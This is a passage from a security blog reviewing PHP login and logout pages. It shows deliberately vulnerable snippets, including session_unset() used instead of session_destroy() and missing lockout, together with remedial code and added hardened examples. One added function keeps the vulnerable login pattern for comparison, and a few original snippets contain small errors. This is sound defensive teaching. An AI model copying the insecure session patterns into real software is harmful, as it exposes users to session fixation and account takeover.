<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note1: </span><span style="font-family: "cambria"; font-size: 12pt;">At this point it should be noted that when on, </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12pt; font-style: italic;">register_globals </span><span style="font-family: "cambria"; font-size: 12pt;">(which is on by default in PHP <
5.3.0), will allow an adversary to populate the cookie username variable from various user input such
request variables from HTML hidden form fields, Web Application URL’s etc. which translates into
working as a vulnerability amplifier! Also this might lead into allowing POST to GET interchanges,
promoting CSRF like attacks (e.g. the web app does not distinguish POST from GET).</span><br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note2: </span><span style="font-family: "cambria"; font-size: 12pt;">This feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0. </span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><br />
<div class="column">
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: //the filter makes sure the username has no spaces. if (strpos($username, " ") !== false){
2: // De-‐validate the session
3: }
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">2nd Code Chunk:</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: trim("^$", $username)//Not recommended to process malicious payloads, only identify.
</code></pre>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">The NULL value translates into an empty string when validations come. </span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px;"><b>No Proper Session Termination</b></span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary may on purpose exploit this vulnerability without the need of developing any costume
tools. This attack might be used to perform vertical/horizontal user escalation (e.g. the cookie session-‐
id is assigned to a new user, and the new user automatically gains access to previous user Web
resources, assuming that the Web Apps makes access control decisions by using only the session-‐id.
Another attack scenario would be that the session is leaked though a blog post and the adversary
makes use of the non de-‐validated leaked session to gain access to the Web Application user resources
etc.).</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span><span style="font-family: "cambria"; font-size: 12.000000pt;"> </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: session_unset(); // Improper handling of the session.
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note1: </span><span style="font-family: "cambria"; font-size: 12pt;">The function shown above does not properly de-‐validate the session. The session_unset
function just clears the </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION </span><span style="font-family: "cambria"; font-size: 12pt;">variable. It’s equivalent to doing </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION = array(); </span><span style="font-family: "cambria"; font-size: 12pt;">So this does
only affect the local </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION </span><span style="font-family: "cambria"; font-size: 12pt;">variable instance, but not the session data in the session storage,
everything else remains unchanged (including the session identifier). In this occasion the
session_unset is used to destroy/reset the session instead of the </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">session_destroy </span><span style="font-family: "cambria"; font-size: 12pt;">function in the logout
page. The </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">session_destroy() </span><span style="font-family: "cambria"; font-size: 12pt;">function destroys all of the data associated with the current session.</span><br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note2: </span><span style="font-family: "cambria"; font-size: 12pt;">The variable </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">session_unset </span><span style="font-family: "cambria"; font-size: 12pt;">is considered to be deprecated code that does not use </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code: </span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: function destroySession() {
2: $params = session_get_cookie_params(); setcookie(session_name(), '', time() -‐ 42000,
3: $params["path"], $params["domain"],
4: ... );
5: session_destroy(); }
</code></pre>
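As an added example that is not code from the original post, here is a logout page that addresses both issues covered above: the NULL de-authentication bypass (a whitelist check on the session username instead of a bare isset) and improper session termination (cookie expiry plus session_destroy). The function names isWellFormedUsername, destroySession and classifySessionUsername are assumptions; only require_once 'common.php' and the redirect to index.php come from the post, and the cookie parameters follow the php.net session_destroy manual example.<br />

```php
<?php
// Added example, not code from the original post. Function names are assumptions.
declare(strict_types=1);

// NULL de-authentication bypass countermeasure: a whitelist check on the session
// username. isset() only tells you the key exists and is not null; this function
// also rejects leading/trailing spaces, NUL bytes and any other stray character.
function isWellFormedUsername($username): bool
{
    if (!is_string($username)) {
        return false;
    }
    return preg_match('/^[a-zA-Z0-9]{1,32}$/', $username) === 1;
}

// Session termination countermeasure: clear the array, expire the cookie and
// destroy the server-side data, so the old identifier is useless afterwards.
// The setcookie() parameters mirror the php.net session_destroy example.
function destroySession(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000,
            $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

// Decides whether the stored username looks tampered with. The session is
// destroyed either way; the result is only a signal worth logging.
function classifySessionUsername(array $session): string
{
    return isWellFormedUsername($session['username'] ?? null) ? 'clean' : 'suspicious';
}

if (PHP_SAPI !== 'cli') {
    require_once 'common.php';   // assumed to exist, as in the original post
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    error_log('logout: session username looked ' . classifySessionUsername($_SESSION));
    destroySession();
    header('Location: index.php');
    exit; // nothing after the redirect may keep running
} else {
    // Constructed samples, shaped like the payloads listed in the post.
    $samples = ['user12', 'user 12', "\0user12", ' user12 ', ''];
    foreach ($samples as $u) {
        printf("%-14s %s\n", json_encode($u), isWellFormedUsername($u) ? 'well formed' : 'rejected');
    }
}
```

The design point is that the logout path never depends on what the session variable contains: a malformed username changes what gets logged, not whether the session is destroyed. Run the file from the command line to see how the sample usernames are classified.<br />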
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;">References:</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">1. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/security.globals.php">http://php.net/manual/en/security.globals.php</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">2. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="https://www.owasp.org/index.php/Unvalidated_Input" target="_blank">https://www.owasp.org/index.php/Unvalidated_Input</a></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">3. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/function.isset.php">http://php.net/manual/en/function.isset.php</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">4. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/function.trim.php">http://php.net/manual/en/function.trim.php</a> </span></div>
<br /></div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-52912019467601595592014-04-14T15:15:00.001-07:002017-01-12T14:35:14.113-08:00PHP Source Code Chunks of Insanity (Logins Pages) Part 1<b>Intro </b><br />
<br />
This post is going to talk about PHP source code review and demonstrate how a relatively small chunk of code can cause you a lot of problems.<br />
<br />
<b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. The code might seem innocent to some, but obviously it is not. We are going to assume that it is used by some web site to validate the credentials and allow users to log in. <br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <?php
require_once 'commonFunctionality.php';
if (validateCredentials($someUsername, $somePassword)) {
header('Location: myIndex.php'); }
else {
header('Location: wrong_login.php'); }
?>
</code></pre>
<br />
If you look carefully at the code you will see that it is vulnerable to the following issues:<br />
<ol>
<li><span style="font-family: "cambria"; font-size: 12pt;">Reflected/Stored XSS</span></li>
<li><span style="font-family: "cambria"; font-size: 12pt;">Session Fixation/Session Hijacking</span> </li>
<li><span style="font-family: "cambria"; font-size: 12pt;">Lock Out Mechanism Not In Place</span></li>
</ol>
Think this is not accurate? Think better.<br />
<br />
<b>Session Fixation/Session Hijacking </b><br />
<br />
An adversary may deliberately exploit this vulnerability without the need to develop any custom tools (e.g. the session gets exposed in a blog post or within the same application, or is passed in the HTTP Referer header and gets cached in a Web proxy controlled by an adversary). This attack might also be used to abuse user privileges (e.g. escalate the privileges of one user by manipulating the session identifier, perform vertical and horizontal privilege escalation, etc.). It should be noted at this point that the issues described above are possible only if the web application makes decisions based solely on the session identifier.<br />
<br />
Vulnerable Code:<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">session_unset(); // Improper handling of the session.
</code></pre>
<br />
Explanation:<br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">The function shown above does not properly handle the session. </span><span style="font-family: "cambria"; font-size: 12pt; font-style: italic;">session_unset() </span><span style="font-family: "cambria"; font-size: 12pt;">only empties the </span><span style="font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION </span><span style="font-family: "cambria"; font-size: 12pt;">array for the current request (the equivalent of </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION = array()</span><span style="font-family: "cambria"; font-size: 12pt;">); it neither destroys the session nor changes the session identifier. Here
session_unset is used in the login page to clear the user information from the session, instead of
issuing a fresh identifier at login (session_destroy belongs in the logout page). This translates into not logging out the previous user properly (e.g. the next user
may again get access to the account of the previous user), and into an identifier that an attacker fixed before authentication staying valid after it. The Web Application also makes
decisions without evaluating anything but the session identifier before giving access to Web Resources; the
decision should rest on the username, a variable called logged_in and a freshly regenerated session id. Part of the fix is
therefore to also set another variable, e.g. </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION['logged_in'] = true </span><span style="font-family: "cambria"; font-size: 12pt;">(see code
below). </span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<br />
Business Impact:<br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">The possibility of this vulnerability going public (e.g. blog posts start appearing on the Internet
revealing the issue) would cause severe customer reputation and revenue loss; this vulnerability
allows an adversary to potentially launch personalized phishing attacks (e.g. deceive a user into clicking
a link carrying a fixed session identifier) and to abuse web application user privileges.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">function init_session() {
    ...
    session_start();               // Start the PHP session
    session_regenerate_id(true);   // Issue a new session ID and delete the old session data
    $_SESSION['logged_in'] = true; // Explicit authenticated-state flag, checked on every request
    ...
}
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;">Regenerate the session ID anytime the session's status changes. That means any of the following:</span><br />
<div class="column">
<ol>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">User authentication (e.g. in the login page, other multiple authentication stages etc.).
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Storing privilege level information in the session (e.g. temporary random variables, valid only
</span><br />
<span style="font-size: 12pt;">for the current session etc.)
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Regenerate the session identifier whenever the user's privilege level changes. </span></li>
</ol>
</div>
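To tie the remedial steps together, here is an added example (not code from the original post) of a complete login, page-guard and logout flow. It assumes that the validateCredentials() function from commonFunctionality.php, which the post never shows, returns true for a valid username/password pair, and it reuses the page names myIndex.php and wrong_login.php; the session_unset() variant criticised above is kept next to the hardened one for comparison.

```php
<?php
// Added example (not from the original post): a complete login/logout flow that
// applies the remedial steps above. Assumes validateCredentials() from
// commonFunctionality.php returns true for a valid username/password pair, and the
// page names myIndex.php and wrong_login.php from the post. Requires PHP 7.3+.
declare(strict_types=1);

require_once 'commonFunctionality.php';

// Start the session with hardened cookie settings. use_strict_mode makes PHP refuse
// session identifiers it did not issue itself, which is the direct counter to an
// attacker planting ("fixating") an identifier of their choosing before login.
function start_hardened_session(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');
    session_set_cookie_params([
        'httponly' => true,     // not readable from JavaScript
        'secure'   => true,     // never sent over plain HTTP
        'samesite' => 'Strict', // not sent on cross-site requests
    ]);
    session_start();
}

// The pattern criticised in the post: session_unset() empties $_SESSION but the
// identifier survives, so whoever knew it before login owns the account afterwards.
function login_vulnerable(string $username, string $password): bool
{
    start_hardened_session();
    session_unset();
    if (!validateCredentials($username, $password)) {
        return false;
    }
    $_SESSION['username'] = $username;
    return true;
}

// Hardened variant: rotate the identifier at the privilege change, drop the old
// session data, and record an explicit authenticated-state flag.
function login_hardened(string $username, string $password): bool
{
    start_hardened_session();
    if (!validateCredentials($username, $password)) {
        return false;
    }
    session_regenerate_id(true);       // new ID; the old session file is deleted
    $_SESSION = [];                    // nothing from the pre-login session is kept
    $_SESSION['logged_in']  = true;
    $_SESSION['username']   = $username;
    $_SESSION['login_time'] = time();
    return true;
}

// Guard for protected pages: the decision rests on the flag, not on the mere
// presence of a session identifier.
function require_login(): void
{
    start_hardened_session();
    if (empty($_SESSION['logged_in'])) {
        header('Location: wrong_login.php');
        exit;
    }
}

// Proper logout (this belongs in the logout page, not the login page): wipe the
// server-side data, expire the cookie in the browser, then destroy the session.
function logout(): void
{
    start_hardened_session();
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}

// Login page flow, replacing the snippet analysed at the top of the post.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $ok = login_hardened((string)($_POST['username'] ?? ''), (string)($_POST['password'] ?? ''));
    header('Location: ' . ($ok ? 'myIndex.php' : 'wrong_login.php'));
    exit; // never keep executing after issuing a redirect
}
```

Note the exit after each header('Location: ...'): without it the rest of the script keeps running for the redirected request, which is a second defect of the original snippet that the post does not mention.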
<span style="font-family: "cambria"; font-size: 12pt;"><b>Lock Out Mechanism Not In Place</b></span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary may exploit this vulnerability on purpose without needing to develop any custom
tools (e.g. by using Burp Intruder or Hydra to perform online password guessing attacks).</span><br />
<br />
Vulnerable Code:<br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">$username = $_POST['username'];
$password = $_POST['password'];
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">The Web Application should implement server side controls in the login page to prevent
password brute forcing attacks.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">function lockout($username, $password) {
    $now = time();
    $counter = 0; // failed attempts for this account within the window (load from the database)
    if (!validateCredentials($username, $password)) {
        $counter = $counter + 1; // Save the attempt and its time in the database, retrieve the
                                 // previous login attempt times and compare them against the window ...
    }
}
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12pt;">The Web Application should take the following actions to prevent online dictionary attacks and to make a stolen session identifier harder to reuse:</span><br />
<div class="column">
<ol>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Make use of login attempt counters (e.g. allow 3 failed attempts within 30 minutes).
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Associate the user IP with the session (e.g. generate proper audit trails to later on ban that ip).
</span><br />
<span style="font-size: 12pt;">Include the user's IP address from </span><span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SERVER['REMOTE_ADDR'] </span><span style="font-size: 12pt;">in the session. Store it in
</span><br />
<span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SESSION['remote_ip'].
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Run integrity checks of the session (although this functionality might be included in another
</span><br />
<span style="font-size: 12pt;">function).
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Include the user agent from </span><span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SERVER['HTTP_USER_AGENT'] </span><span style="font-size: 12pt;">in the session. Store it in a session
</span><br />
<span style="font-size: 12pt;">variable </span><span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SESSION['user_agent']. </span><span style="font-size: 12pt;">Then, on each subsequent request check that it matches
(Note: The user agent can be very easily spoofed).</span><span style="font-size: 12pt;"> </span></li>
</ol>
</div>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">It should also be noted that since the session parameters are populated with sensitive
information such as the username, further action should be taken to remove this
information (e.g. replace the username with a temporary user id). Gaining access to the username
significantly reduces the effort of a brute-force login attempt, since only the password remains unknown. </span><br />
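The sketch above leaves the actual counter logic to the reader, so here is an added example (not code from the original post) of a database-backed counter that enforces the "3 failed attempts within 30 minutes" rule from the list. It assumes PDO with the SQLite driver for the stand-alone demo (any PDO connection works), a hypothetical login_attempts table, a dummy credential check in place of validateCredentials(), and PHP 8.

```php
<?php
// Added example (not from the original post): a database-backed failed-login
// counter implementing "3 failures within 30 minutes locks the account".
// Assumes PDO with the sqlite driver for the stand-alone demo and PHP 8.
declare(strict_types=1);

final class LoginThrottle
{
    public function __construct(
        private PDO $db,
        private int $maxFailures = 3,
        private int $windowSeconds = 1800,
    ) {
        // Hypothetical table; in production create it in a migration instead.
        $this->db->exec('CREATE TABLE IF NOT EXISTS login_attempts (
            username TEXT NOT NULL, remote_ip TEXT NOT NULL, attempted_at INTEGER NOT NULL)');
    }

    // Number of failed attempts for this account inside the sliding window.
    public function recentFailures(string $username, int $now): int
    {
        $stmt = $this->db->prepare(
            'SELECT COUNT(*) FROM login_attempts WHERE username = ? AND attempted_at > ?');
        $stmt->execute([$username, $now - $this->windowSeconds]);
        return (int) $stmt->fetchColumn();
    }

    public function isLockedOut(string $username, int $now): bool
    {
        return $this->recentFailures($username, $now) >= $this->maxFailures;
    }

    public function recordFailure(string $username, string $remoteIp, int $now): void
    {
        // Audit trail: who, from where, when. Rows outside the window are pruned.
        $this->db->prepare('DELETE FROM login_attempts WHERE attempted_at <= ?')
                 ->execute([$now - $this->windowSeconds]);
        $this->db->prepare('INSERT INTO login_attempts VALUES (?, ?, ?)')
                 ->execute([$username, $remoteIp, $now]);
    }

    public function clearFailures(string $username): void
    {
        $this->db->prepare('DELETE FROM login_attempts WHERE username = ?')->execute([$username]);
    }

    // Wraps any credential check. Returns 'locked', 'ok' or 'bad'. The lockout test
    // runs BEFORE the credential check so a locked account cannot be probed at all.
    public function attempt(string $username, string $password, string $remoteIp,
                            callable $validateCredentials, ?int $now = null): string
    {
        $now ??= time();
        if ($this->isLockedOut($username, $now)) {
            return 'locked';
        }
        if (!$validateCredentials($username, $password)) {
            $this->recordFailure($username, $remoteIp, $now);
            return 'bad';
        }
        $this->clearFailures($username);
        return 'ok';
    }
}

// Stand-alone demo with a constructed in-memory database and a dummy credential check.
$throttle = new LoginThrottle(new PDO('sqlite::memory:'));
$check    = fn(string $u, string $p): bool => $u === 'alice' && $p === 'correct horse';
$t0       = 1_700_000_000;

$log = [];
foreach (['x', 'y', 'z', 'correct horse'] as $i => $guess) {
    $log[] = $throttle->attempt('alice', $guess, '203.0.113.7', $check, $t0 + $i);
}
// 1801 seconds later two of the three failures have aged out, so the login succeeds.
$log[] = $throttle->attempt('alice', 'correct horse', '203.0.113.7', $check, $t0 + 1801);
echo implode(' ', $log), PHP_EOL;   // bad bad bad locked ok
```

Two caveats a reviewer will raise: the 'locked' result must be reported to the browser with the same generic message as a bad password, otherwise the endpoint confirms which usernames exist; and a hard per-account lock hands an attacker a denial-of-service lever against any user whose name they know, so pair it with per-IP counters or increasing delays rather than relying on it alone.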
<b style="font-family: Cambria; font-size: 12pt;"><br /></b>
<b style="font-family: Cambria; font-size: 12pt;">Reflected/Stored XSS</b><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary can exploit this vulnerability without needing to develop any custom tools. Point-and-click
tools are available on the Internet and might be used to exploit this vulnerability (e.g. the Social-Engineer
Toolkit). Escalating the issue further, an adversary might use this attack to
compromise multiple company sites (e.g. by using it as an XSS proxy).</span><br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">This might also lead to unrestricted redirection attacks. Due to the limited amount of time at my
disposal no further investigation was conducted (e.g. load the login page on an Apache server and see if the
username variable is passed in the URL or the Location header field). </span></div>
<br />
Vulnerable Code:<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $_SESSION['username'] = $username;
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">Even though we don't have access to the rest of the Web App code, it is highly likely that the
username value is displayed back to the user or placed in HTTP header fields. </span><br />
<br />
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Provide server-side filters for the vulnerability. Make use of regular expressions and HTML-encode the
variables whether they are displayed back to the user or not (for defence in depth, and to make sure
that the Set-Cookie header field or other fields cannot be abused).</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;"><u>1st Layer of defense</u></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
</div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">$username = preg_replace("/[^a-zA-Z0-9_\-]+/", "", $username);
</code></pre>
<br />
